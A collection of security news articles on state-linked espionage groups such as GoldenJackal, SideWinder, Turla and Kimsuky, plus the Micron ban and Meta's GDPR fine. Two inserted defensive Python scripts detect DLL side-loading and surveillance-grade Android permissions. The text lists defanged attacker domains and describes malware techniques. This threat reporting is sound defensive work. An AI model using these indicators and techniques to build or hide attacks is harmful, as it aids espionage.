"No longer are the most experienced cybercriminal actors relying on one or a few techniques, but rather are frequently developing and iterating new TTPs. The rapid rate of change for many threat actors suggests they have the time, capability, and understanding of the threat landscape to rapidly develop and execute new techniques."
GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments
24.5.23 BigBrothers The Hacker News
Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal.
Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.
The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.
GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.
What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bear all the hallmarks of a state-sponsored group.
That said, some tactical overlaps have been observed between the threat actor and Turla, one of Russia's elite nation-state hacking crews. In one instance, a victim machine was infected by Turla and GoldenJackal two months apart.
The exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.
While the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware.
JackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, and upload files to and download files from the system.
Geography of victims
Some of the other malware families deployed by GoldenJackal are as follows -
JackalSteal - An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.
JackalWorm - A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.
JackalPerInfo - Malware that harvests system metadata, folder contents, installed applications, running processes, and credentials stored in web browser databases.
JackalScreenWatcher - A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.
Another notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.
"The group is probably trying to reduce its visibility by limiting the number of victims," Kaspersky researcher Giampaolo Dedola said. "Their toolkit seems to be under development – the number of variants shows that they are still investing in it."
China Bans U.S. Chip Giant Micron, Citing "Serious Cybersecurity Problems"
24.5.23 BigBrothers The Hacker News
China has banned U.S. chip maker Micron from selling its products to Chinese companies working on key infrastructure projects, citing national security risks.
The development comes nearly two months after the country's cybersecurity authority initiated a probe in late March 2023 to assess potential network security risks.
"The purpose of this network security review of Micron's products is to prevent product network security problems from endangering the security of national critical information infrastructure, which is a necessary measure to maintain national security," the Cyberspace Administration of China (CAC) said.
The CAC further said the investigation found "serious cybersecurity problems" in Micron's products, endangering the country's critical information infrastructure supply chain.
As a result, operators involved in such critical information infrastructure projects should stop purchasing products from Micron, it added.
The authority did not disclose the specific cybersecurity concerns posed by Micron, but cited violations of local laws and regulations.
In a statement shared with the Wall Street Journal, Micron said it's "evaluating the conclusion and assessing our next steps." The restrictions "have no basis in fact," the U.S. Commerce Department was quoted as saying to BBC.
The tit-for-tat development comes amid escalating geopolitical tensions between China and the U.S., and mirrors similar moves made by the U.S. government against Chinese equipment makers over security concerns.
E.U. Regulators Hit Meta with Record $1.3 Billion Fine for Data Transfer Violations
24.5.23 BigBrothers The Hacker News
Facebook's parent company Meta has been fined a record $1.3 billion by European Union data protection regulators for transferring the personal data of users in the region to the U.S.
In a binding decision taken by the European Data Protection Board (EDPB), the social media giant has been ordered to bring its data transfers into compliance with the GDPR and delete unlawfully stored and processed data within six months.
Additionally, Meta has been given five months to suspend any future transfer of Facebook users' data to the U.S. Instagram and WhatsApp, which are also owned by the company, are not subject to the order.
"The EDPB found that Meta IE's infringement is very serious since it concerns transfers that are systematic, repetitive, and continuous," Andrea Jelinek, EDPB Chair, said in a statement.
"Facebook has millions of users in Europe, so the volume of personal data transferred is massive. The unprecedented fine is a strong signal to organizations that serious infringements have far-reaching consequences."
European data protection authorities have repeatedly emphasized that the U.S. lacks privacy protections equivalent to those of the GDPR, potentially allowing American intelligence services to access data belonging to Europeans once it is shipped to servers located in the U.S.
The ruling stems from a legal complaint filed by Austrian privacy activist Maximilian Schrems, the founder of NOYB, almost a decade ago in June 2013 over concerns that E.U. user data is not sufficiently safeguarded from U.S. mass surveillance programs when transferred across the Atlantic.
"The simplest fix would be reasonable limitations in U.S. surveillance law," Schrems said. "There is an understanding on both sides of the Atlantic that we need probable cause and judicial approval of surveillance.
"It would be time to grant these basic protections to E.U. customers of U.S. cloud providers. Any other big U.S. cloud provider, such as Amazon, Google or Microsoft could be hit with a similar decision under E.U. law."
"Meta plans to rely on the new deal for transfers going forward, but this is likely not a permanent fix," Schrems further added. "In my view, the new deal has maybe a ten percent chance of not being killed by the CJEU. Unless U.S. surveillance laws get fixed, Meta will likely have to keep E.U. data in the E.U."
Schrems also accused the Irish Data Protection Commission (DPC) of consistently attempting to block the case from going forward and of trying to shield Meta both from being fined and from having to delete the data already transferred; the EDPB overturned the DPC on the latter two points.
Meta, in response, said it intends to appeal the ruling, calling the fine "unjustified and unnecessary" and that there is a "fundamental conflict of law" between the U.S. government's rules on access to data and European privacy rights.
"Without the ability to transfer data across borders, the internet risks being carved up into national and regional silos, restricting the global economy and leaving citizens in different countries unable to access many of the shared services we have come to rely on," Meta's Nick Clegg and Jennifer Newstead said.
Last year, the company warned that if ordered to suspend transfers to the U.S., it may have to stop offering "a number of our most significant products and services" in the E.U. According to the Wall Street Journal, a new trans-Atlantic data transfer deal is expected to be finalized as a replacement for the Privacy Shield later this year.
The fine constitutes the largest ever imposed under the E.U.'s GDPR privacy laws, eclipsing the €746 million ($886.6 million at the time) fine previously doled out to Amazon in July 2021 for similar privacy violations.
The development also marks the third monetary penalty issued by the DPC to Meta this year alone. In January, the watchdog levied a fine of €390 million over Meta's mishandling of user information to serve ads on Facebook and Instagram.
Two weeks later, Meta was fined €5.5 million for violating data protection laws by compelling its users to "consent to the processing of their personal data for service improvement and security" and "making the accessibility of its services conditional on users accepting the updated Terms of Service."
Bad Magic's Extended Reign in Cyber Espionage Goes Back Over a Decade
24.5.23 BigBrothers The Hacker News
New findings about a hacker group linked to cyber attacks targeting companies in the Russo-Ukrainian conflict area reveal that it may have been around for much longer than previously thought.
The threat actor, tracked as Bad Magic (aka Red Stinger), has not only been linked to a fresh sophisticated campaign, but also to an activity cluster that first came to light in May 2016.
"While the previous targets were primarily located in the Donetsk, Luhansk, and Crimea regions, the scope has now widened to include individuals, diplomatic entities, and research organizations in Western and Central Ukraine," Russian cybersecurity firm Kaspersky said in a technical report published last week.
The campaign is characterized by the use of a novel modular framework codenamed CloudWizard, which features capabilities to take screenshots, record microphone, log keystrokes, grab passwords, and harvest Gmail inboxes.
Bad Magic was first documented by the company in March 2023, detailing the group's use of a backdoor called PowerMagic (aka DBoxShell or GraphShell) and a modular framework dubbed CommonMagic in attacks targeting Russian-occupied territories of Ukraine.
Then earlier this month, Malwarebytes revealed at least five waves of espionage attacks mounted by the group dating back to December 2020.
The deeper insight shared by Kaspersky connects Bad Magic to prior activity based on combing through historical telemetry data, allowing the company to identify various artifacts associated with the CloudWizard framework from 2017 to 2020.
The initial access vector used to drop the first-stage installer is currently unknown. That said, the malware is configured to drop a Windows service ("syncobjsup.dll") and a second file ("mods.lrc"), which, in turn, contains three different modules to harvest and exfiltrate sensitive data.
The information is transmitted in encrypted form to an actor-controlled cloud storage endpoint (OneDrive, Dropbox, or Google Drive). A web server is used as a fallback mechanism in the event none of the services are accessible.
Kaspersky said it identified source code overlaps between an older version of CloudWizard and another malware known as Prikormka, which was discovered by Slovak cybersecurity company ESET in 2016.
Image Source: ESET
The espionage campaign, monitored by ESET under the moniker Operation Groundbait, primarily singled out anti-government separatists in Donetsk and Luhansk and Ukrainian government officials, politicians, and journalists.
Prikormka is deployed via a dropper contained within malicious email attachments and features 13 different components to harvest various kinds of data from compromised machines. Evidence gathered by ESET shows that the malware has been selectively used since at least 2008.
CloudWizard also exhibits resemblances with a related intrusion set called BugDrop that was disclosed by CyberX (which has since been acquired by Microsoft) in 2017, with the industrial cybersecurity company describing it as more advanced than Groundbait.
Commonalities have also been unearthed between CloudWizard and CommonMagic, including identical source code and victimology patterns, indicating that the threat actor has been repeatedly tweaking its malware arsenal and infecting targets for about 15 years.
The latest development, in attributing the CloudWizard framework to the actor behind Operation Groundbait and Operation BugDrop, provides yet another piece to the puzzle that hopes to eventually reveal the bigger picture of the mysterious group's origins.
"The threat actor responsible for these operations has demonstrated a persistent and ongoing commitment to cyber espionage, continuously enhancing their toolset and targeting organizations of interest for over 15 years," Kaspersky researcher Georgy Kucherin said.
"Geopolitical factors continue to be a significant motivator for APT attacks and, given the prevailing tension in the Russo-Ukrainian conflict area, we anticipate that this actor will persist with its operations for the foreseeable future."
Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks
19.5.23 BigBrothers The Hacker News
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country.
"From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report.
The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023.
Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics.
What's more, the spike in malicious emails targeting Taiwan was followed by a 15x increase in PlugX detections between April 10 and April 12, 2023, indicating that the phishing lures acted as an initial access vector to drop additional payloads.
PlugX, a remote access trojan spotted in the wild since 2008, is a Windows backdoor that has been put to use by numerous Chinese threat actors to control victim machines. It's also known for employing DLL side-loading techniques to fly under the radar.
"This technique consists of a legitimate program loading a malicious dynamic link library (DLL) file that masquerades as a legitimate DLL file," Trellix researchers Daksh Kapur and Leandro Velasco said.
"This allows the execution of arbitrary malicious code bypassing security measures that look for malicious code running directly from an executable file."
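The side-loading pattern the Trellix researchers describe leaves a recognizable trace in image-load telemetry: a DLL bearing the name of a well-known Windows library is loaded from somewhere other than the system directories, typically from the same folder as the legitimate executable that imports it. The detection logic below is an added example written for this page, not Trellix's or anyone's production rule; the system-directory list and the set of commonly imitated DLL names are assumptions, and the telemetry events are constructed to resemble what an EDR or Sysmon image-load event would report.

```python
import ntpath
from dataclasses import dataclass

# Directories that legitimately hold Windows system DLLs (assumed, lowercase).
SYSTEM_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\winsxs",
)

# Names of system DLLs that are frequently imitated for side-loading.
# Illustrative set assumed for this example; a real rule would use a fuller inventory.
SYSTEM_DLL_NAMES = {
    "version.dll", "dbghelp.dll", "wininet.dll", "cryptsp.dll", "userenv.dll",
}


@dataclass
class ImageLoad:
    """One image-load event (constructed; mirrors the fields an EDR or Sysmon reports)."""
    process_path: str
    module_path: str
    process_signed: bool   # signature status of the loading executable
    module_signed: bool    # signature status of the loaded DLL


def _dir(path):
    return ntpath.dirname(path).lower().rstrip("\\")


def _in_system_dir(directory):
    # Exact match or a proper subdirectory; avoids matching "system32evil".
    return any(directory == d or directory.startswith(d + "\\") for d in SYSTEM_DIRS)


def classify(event):
    """Return None for a normal load, otherwise a (severity, reason) tuple."""
    name = ntpath.basename(event.module_path).lower()
    if name not in SYSTEM_DLL_NAMES:
        return None
    module_dir = _dir(event.module_path)
    if _in_system_dir(module_dir):
        return None  # loaded from where it belongs
    same_dir = module_dir == _dir(event.process_path)
    if same_dir and event.process_signed and not event.module_signed:
        host = ntpath.basename(event.process_path)
        return ("high", f"signed {host} loaded unsigned {name} from its own directory")
    return ("medium", f"{name} loaded from non-system directory {module_dir}")


def detect_sideloading(events):
    """Run classify over a batch of events and return (process, module, severity, reason) findings."""
    findings = []
    for ev in events:
        verdict = classify(ev)
        if verdict is not None:
            findings.append((ev.process_path, ev.module_path) + verdict)
    return findings


# Constructed sample telemetry: two normal loads, one classic side-load, one odd load.
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Program Files\Vendor\app.exe",
              r"C:\Windows\System32\version.dll", True, True),
    ImageLoad(r"C:\Program Files\Vendor\app.exe",
              r"C:\Program Files\Vendor\vendorlib.dll", True, True),
    ImageLoad(r"C:\Users\victim\AppData\Roaming\Update\legit.exe",
              r"C:\Users\victim\AppData\Roaming\Update\version.dll", True, False),
    ImageLoad(r"C:\Users\victim\AppData\Local\Temp\setup.exe",
              r"C:\Users\victim\AppData\Local\Temp\lib\dbghelp.dll", False, False),
]

if __name__ == "__main__":
    for finding in detect_sideloading(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

The "high" verdict captures exactly the arrangement in the quote: a signed, legitimate program importing a library by name and resolving it to an unsigned copy sitting next to it. Loads of a system-named DLL from any other non-system path get a lower severity because some installers and portable applications ship private copies, so those need triage rather than an automatic block.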
Besides PlugX, Trellix said it also identified other malware families such as the Kryptik trojan as well as stealers like Zmutzy and FormBook targeting the nation.
That's not all. Some of the socially engineered messages contained links to seemingly innocuous login pages that mimic legitimate brands, including DHL, in an attempt to trick users into entering their credentials.
"In the past few years, we noticed that geopolitical conflicts are one of the main drivers for cyber attacks on a variety of industries and institutions," Joseph Tal, senior vice president of the Trellix Advanced Research Center, said.
"Monitoring geopolitical events can help organizations to predict cyber attacks in countries they operate in."
State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered
17.5.23 BigBrothers The Hacker News
Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China.
This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News.
"The identified phishing domains mimic various organizations in the news, government, telecommunications, and financial sectors," researchers Nikita Rostovtsev, Joshua Penny, and Yashraj Solanki said.
SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to obtain a foothold into targeted environments.
The target range of the group is widely believed to be associated with Indian espionage interests. The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore.
Earlier this February, Group-IB brought to light evidence that SideWinder may have targeted 61 government, military, law enforcement, and other organizations across Asia between June and November 2021.
More recently, the nation-state group was observed leveraging a technique known as server-based polymorphism in evasive attacks targeting Pakistani government organizations.
The newly discovered domains mimic government organizations in Pakistan, China, and India and are characterized by the use of the same values in WHOIS records and similar registration information.
Hosted on some of these domains are government-themed lure documents that are designed to download an unknown next-stage payload.
A majority of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One among them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which was analyzed by both QiAnXin and BlackBerry in recent months.
Also uncovered is a Windows shortcut (LNK) file that was uploaded to VirusTotal from Beijing in late November 2022. The LNK file, for its part, is engineered to run an HTML application (HTA) file retrieved from a remote server that spoofs Tsinghua University's email system (mailtsinghua.sinacn[.]co).
Another LNK file that was uploaded to VirusTotal around the same time from Kathmandu employs a similar method to fetch an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov[.]org).
Further investigation into SideWinder's infrastructure has led to the discovery of a malicious Android APK file (226617) that was uploaded to VirusTotal from Sri Lanka in March 2023.
The rogue Android app passes off as a "Ludo Game" and prompts users to grant it access to contacts, location, phone logs, SMS messages, and calendar, effectively functioning as spyware capable of harvesting sensitive information.
Group-IB said the app also exhibits similarities with the fake Secure VPN app the company disclosed in June 2022 as being distributed to targets in Pakistan by means of a traffic direction system (TDS) called AntiBot.
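A game that asks for contacts, location, call logs, SMS and calendar access is the kind of mismatch an app-vetting step can catch before a device is enrolled. The script below is an added example, not Group-IB's or Bridewell's tooling; it parses a constructed AndroidManifest.xml, maps the (real) Android permission names onto the data categories they unlock, and flags an app that reaches into several of them. The grouping and the threshold are this example's own choices.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Real Android permission names, grouped into the data categories they unlock.
# The grouping and the threshold below are assumptions made for this example.
SURVEILLANCE_PERMISSIONS = {
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.ACCESS_COARSE_LOCATION": "location",
    "android.permission.READ_CALL_LOG": "phone logs",
    "android.permission.READ_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.READ_CALENDAR": "calendar",
    "android.permission.RECORD_AUDIO": "microphone",
}


def requested_permissions(manifest_xml):
    """Return the permission names declared in <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    attr = f"{{{ANDROID_NS}}}name"
    return [el.get(attr) for el in root.iter("uses-permission") if el.get(attr)]


def surveillance_categories(manifest_xml):
    """Distinct surveillance-grade data categories the app can reach, sorted."""
    return sorted({SURVEILLANCE_PERMISSIONS[p]
                   for p in requested_permissions(manifest_xml)
                   if p in SURVEILLANCE_PERMISSIONS})


def triage(manifest_xml, threshold=3):
    """Flag an app when it reaches `threshold` or more surveillance-grade categories."""
    root = ET.fromstring(manifest_xml)
    cats = surveillance_categories(manifest_xml)
    return {
        "package": root.get("package"),
        "categories": cats,
        "flag": len(cats) >= threshold,
    }


# Constructed manifest for a "game" requesting the data set described in the report.
GAME_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.ludogame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CALENDAR"/>
</manifest>
"""

# Constructed manifest for a game with a permission set that fits its purpose.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.dicegame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.VIBRATE"/>
</manifest>
"""

if __name__ == "__main__":
    for manifest in (GAME_MANIFEST, BENIGN_MANIFEST):
        print(triage(manifest))
```

On a real APK the manifest is binary-encoded and must first be decoded (for example with apktool or aapt) before it can be fed to this parser; the category mapping is deliberately coarse so that a single over-broad permission does not by itself trip the flag, while a game that wants five unrelated personal data sources does.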
In all, the domains point to SideWinder setting its sights on financial, government, and law enforcement organizations, as well as companies specializing in e-commerce and mass media in Pakistan and China.
"Like many other APT groups, SideWinder relies on targeted spear-phishing as the initial vector," the researchers said. "It is therefore important for organizations to deploy business email protection solutions that detonate malicious content."
U.S. Government Neutralizes Russia's Most Sophisticated Snake Cyber Espionage Tool
12.5.23 BigBrothers The Hacker News
The U.S. government on Tuesday announced the court-authorized disruption of a global network compromised by an advanced malware strain known as Snake wielded by Russia's Federal Security Service (FSB).
Snake, dubbed the "most sophisticated cyber espionage tool," is the handiwork of a Russian state-sponsored group called Turla (aka Iron Hunter, Secret Blizzard, SUMMIT, Uroburos, Venomous Bear, and Waterbug), which the U.S. government attributes to a unit within Center 16 of the FSB.
The threat actor has a track record of heavily focusing on entities in Europe, the Commonwealth of Independent States (CIS), and countries affiliated with NATO, with recent activity expanding its footprint to incorporate Middle Eastern nations deemed a threat to countries supported by Russia in the region.
"For nearly 20 years, this unit [...] has used versions of the Snake malware to steal sensitive documents from hundreds of computer systems in at least 50 countries, which have belonged to North Atlantic Treaty Organization (NATO) member governments, journalists, and other targets of interest to the Russian Federation," the Justice Department said.
"After stealing these documents, Turla exfiltrated them through a covert network of unwitting Snake-compromised computers in the United States and around the world."
The neutralization was orchestrated as part of an effort dubbed Operation MEDUSA by means of a tool created by the U.S. Federal Bureau of Investigation (FBI) codenamed PERSEUS that permitted the authorities to issue commands to the malware that caused it to "overwrite its own vital components" on infected machines.
The self-destruct instructions, engineered after decrypting and decoding the malware's network communications, caused the "Snake implant to disable itself without affecting the host computer or legitimate applications on the computer," the agency said.
Snake, according to an advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), is designed as a covert tool for long-term intelligence collection on high-priority targets, enabling the adversary to create a peer-to-peer (P2P) network of compromised systems across the world.
What's more, several systems in the P2P network served as relay nodes to route disguised operational traffic to and from Snake malware implanted on FSB's ultimate targets, making the activity challenging to detect.
The C-based cross-platform malware further employs custom communication methods to add a new layer of stealth and features a modular architecture that allows for an efficient way to inject or modify components to augment its capabilities and retain persistent access to valuable information.
"Snake demonstrates careful software engineering design and implementation, with the implant containing surprisingly few bugs given its complexity," CISA said, adding initial versions of the implant were developed around early 2004.
"The name Uroburos is appropriate, as the FSB cycled it through nearly constant stages of upgrade and redevelopment."
Infrastructure associated with the Kremlin-backed group has been identified in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, although its targeting is assessed to be more tactical, encompassing government networks, research facilities, and journalists.
Victimized sectors within the U.S. include education, small businesses, and media organizations, as well as critical infrastructure sectors such as government facilities, financial services, critical manufacturing, and communications.
Despite these setbacks, Turla remains an active and formidable adversary, unleashing an array of tactics and tools to breach its targets across Windows, macOS, Linux, and Android.
The development comes a little over a year after U.S. law enforcement and intelligence agencies disarmed a modular botnet known as Cyclops Blink controlled by another Russian nation-state actor referred to as Sandworm.
N. Korean Kimsuky Hackers Using New Recon Tool ReconShark in Latest Cyberattacks
5.5.23 BigBrothers The Hacker News
The North Korean state-sponsored threat actor known as Kimsuky has been discovered using a new reconnaissance tool called ReconShark as part of an ongoing global campaign.
"[ReconShark] is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said.
Kimsuky is also known by the names APT43, ARCHIPELAGO, Black Banshee, Nickel Kimball, Emerald Sleet (previously Thallium), and Velvet Chollima.
Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe.
The latest intrusion set documented by SentinelOne leverages geopolitical themes related to North Korea's nuclear proliferation to activate the infection sequence.
"Notably, the spear-phishing emails are made with a level of design quality tuned for specific individuals, increasing the likelihood of opening by the target," the researchers said. "This includes proper formatting, grammar, and visual clues, appearing legitimate to unsuspecting users."
These messages contain links to booby-trapped Microsoft Word documents hosted on OneDrive to deploy ReconShark, which chiefly functions as a recon tool to execute instructions sent from an actor-controlled server. It's also an evolution of the threat actor's BabyShark malware toolset.
"It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator," Palo Alto Networks Unit 42 said in its analysis of BabyShark in February 2019.
ReconShark is specifically designed to exfiltrate details about running processes, deployed detection mechanisms and hardware information, suggesting that data gathered from the tool is used to carry out "precision attacks" involving malware tailored to the targeted environment in a manner that sidesteps detection.
The malware is also capable of deploying additional payloads from the server based on "what detection mechanism processes run on infected machines."
The findings add to growing evidence that the threat actor is actively shifting its tactics to get a foothold on compromised hosts, establish persistence, and stealthily gather intelligence for extended periods of time.
"The ongoing attacks from Kimsuky and their use of the new reconnaissance tool, ReconShark, highlight the evolving nature of the North Korean threat landscape," SentinelOne said.
Paperbug Attack: New Politically-Motivated Surveillance Campaign in Tajikistan
28.4.23 BigBrothers The Hacker News
A little-known Russian-speaking cyber-espionage group has been linked to a new politically-motivated surveillance campaign targeting high-ranking government officials, telecom services, and public service infrastructures in Tajikistan.
The intrusion set, dubbed Paperbug by Swiss cybersecurity company PRODAFT, has been attributed to a threat actor known as Nomadic Octopus (aka DustSquad).
"The types of compromised machines range from individuals' computers to [operational technology] devices," PRODAFT said in a deep dive technical report shared with The Hacker News. "These targets make operation 'Paperbug' intelligence-driven."
The ultimate motive behind the attacks is unclear at this stage, but the cybersecurity firm has raised the possibility that it could be the work of opposition forces within the country or, alternatively, an intelligence-gathering mission carried out by Russia or China.
Nomadic Octopus first came to light in October 2018 when ESET and Kaspersky detailed a series of phishing attacks mounted by the actor against several countries in Central Asia. The group is estimated to have been active since at least 2014.
The cyber offensives have involved the use of custom Android and Windows malware to strike a mix of high-value entities like local governments, diplomatic missions, and political bloggers, raising the possibility that the threat actor is likely involved in cyber surveillance operations.
The Windows malware, dubbed Octopus and which masqueraded as an alternative version of the Telegram messaging app, is a Delphi-based tool that allows the adversary to surveil victims, siphon sensitive data, and gain backdoor access to their systems via a command-and-control (C2) panel.
A subsequent analysis by Gcow Security in December 2019 highlighted the advanced persistent threat (APT) group's attacks against the Ministry of Foreign Affairs of Uzbekistan to deploy Octopus.
PRODAFT's findings are the result of the discovery of an operational environment managed by Nomadic Octopus since 2020, making Paperbug the first campaign orchestrated by the group since Octopus.
According to data gathered by the company, the threat actor managed to gain access to a telecommunication firm network, before moving laterally to over a dozen targets focusing on government networks, executives, and OT devices with publicly known vulnerabilities. Exactly how and when the telecommunication network was infiltrated is unknown.
"Operation Paperbug aligns with the common trend of attacking into Central Asia government infrastructure that recently became more prominent," PRODAFT noted.
Nomadic Octopus is believed to exhibit some level of cooperation with another Russian nation-state actor known as Sofacy (aka APT28, Fancy Bear, Forest Blizzard, or FROZENLAKE), based on victimology overlaps.
The latest attacks further entailed the use of an Octopus variant that comes with features to take screenshots, run commands remotely, and download and upload files to and from the infected host to a remote server. One such artifact was uploaded to VirusTotal on April 1, 2021.
A closer look at the command-and-control (C2) server reveals that the group managed to successfully backdoor a total of 499 systems as of January 27, 2022, some of which include government network devices, gas stations, and a cash register.
The group, however, doesn't seem to possess advanced toolsets or be too concerned about covering their tracks on victim machines despite the high-stakes nature of the attacks.
"As they operate on the compromised machines to steal information, they sometimes inadvertently caused permission pop-ups on victim computers, which resulted in suspicion from the victim," the company pointed out. "However, this was resolved due to the group diligently naming the files they transfer as benign and inconspicuous programs."
The same tactic extends to the naming of their malicious tools, which the group camouflages as popular web browsers such as Google Chrome, Mozilla Firefox, and Yandex to fly under the radar.
That said, Paperbug attack chains are largely characterized by the use of public offensive tools and generic techniques, which effectively act as a "cloak" for the group and make attribution a lot more challenging.
"This imbalance between the operator skills and importance of the mission might indicate that the operators have been recruited by some entity which provided them a list of commands that need to be executed on each machine exactly," PRODAFT said, adding "the operator follows a checklist and is forced to stick to it."
Iranian Hackers Launch Sophisticated Attacks Targeting Israel with PowerLess Backdoor
25.4.23 BigBrothers The Hacker News
An Iranian nation-state threat actor has been linked to a new wave of phishing attacks targeting Israel that's designed to deploy an updated version of a backdoor called PowerLess.
Cybersecurity firm Check Point is tracking the activity cluster under its mythical creature handle Educated Manticore, which exhibits "strong overlaps" with a hacking crew known as APT35, Charming Kitten, Cobalt Illusion, ITG18, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda.
"Like many other actors, Educated Manticore has adopted recent trends and started using ISO images and possibly other archive files to initiate infection chains," the Israeli company said in a technical report published today.
Active since at least 2011, APT35 has cast a wide net of targets by leveraging fake social media personas, spear-phishing techniques, and N-day vulnerabilities in internet-exposed applications to gain initial access and drop various payloads, including ransomware.
The development is an indication that the adversary is continuously refining and retooling its malware arsenal to expand its functionality and resist analysis efforts, while also adopting enhanced methods to evade detection.
The attack chain documented by Check Point begins with an ISO disk image file that makes use of Iraq-themed lures to drop a custom in-memory downloader that ultimately launches the PowerLess implant.
The ISO file acts as a conduit to display a decoy document written in Arabic, English, and Hebrew, and purports to feature academic content about Iraq from a legitimate non-profit entity called the Arab Science and Technology Foundation (ASTF), indicating that the research community may have been the target of the campaign.
The PowerLess backdoor, previously spotlighted by Cybereason in February 2022, comes with capabilities to steal data from web browsers and apps like Telegram, take screenshots, record audio, and log keystrokes.
"While the new PowerLess payload remains similar, its loading mechanisms have significantly improved, adopting techniques rarely seen in the wild, such as using .NET binary files created in mixed mode with assembly code," Check Point said.
"PowerLess [command-and-control] communication to the server is Base64-encoded and encrypted after obtaining a key from the server. To mislead researchers, the threat actor actively adds three random letters at the beginning of the encoded blob."
The cybersecurity firm said it also discovered two other archive files used as part of a different intrusion set that shares overlaps with the aforementioned attack sequence owing to the use of the same Iraq-themed PDF file.
Further analysis has revealed that the infection chains arising from these two archive files culminate in the execution of a PowerShell script that's engineered to download two files from a remote server and run them.
"Educated Manticore continues to evolve, refining previously observed toolsets and delivering mechanisms," Check Point said, adding "the actor adopts popular trends to avoid detection" and keeps "developing custom toolsets using advanced techniques."
"Because it is an updated version of previously reported malware, [...] it is important to note that it might only represent the early stages of infection, with significant fractions of post-infection activity yet to be seen in the wild."
Russian Hackers Tomiris Targeting Central Asia for Intelligence Gathering
25.4.23 BigBrothers The Hacker News
The Russian-speaking threat actor behind a backdoor known as Tomiris is primarily focused on gathering intelligence in Central Asia, fresh findings from Kaspersky reveal.
"Tomiris's endgame consistently appears to be the regular theft of internal documents," security researchers Pierre Delcher and Ivan Kwiatkowski said in an analysis published today. "The threat actor targets government and diplomatic entities in the CIS."
The Russian cybersecurity firm's latest assessment is based on three new attack campaigns mounted by the hacking crew between 2021 and 2023.
Tomiris first came to light in September 2021 when Kaspersky highlighted its potential connections to Nobelium (aka APT29, Cozy Bear, or Midnight Blizzard), the Russian nation-state group behind the SolarWinds supply chain attack.
Similarities have also been unearthed between the backdoor and another malware strain dubbed Kazuar, which is attributed to the Turla group (aka Krypton, Secret Blizzard, Venomous Bear, or Uroburos).
Spear-phishing attacks mounted by the group have leveraged a "polyglot toolset" comprising a variety of low-sophistication "burner" implants that are coded in different programming languages and repeatedly deployed against the same targets.
Besides using open source or commercially available offensive tools like RATel and Warzone RAT (aka Ave Maria), the custom malware arsenal used by the group falls into one of three categories: downloaders, backdoors, and information stealers -
Telemiris - A Python backdoor that uses Telegram as a command-and-control (C2) channel.
Roopy - A Pascal-based file stealer that's designed to hoover files of interest every 40-80 minutes and exfiltrate them to a remote server.
JLORAT - A file stealer written in Rust that gathers system information, runs commands issued by the C2 server, uploads and downloads files, and captures screenshots.
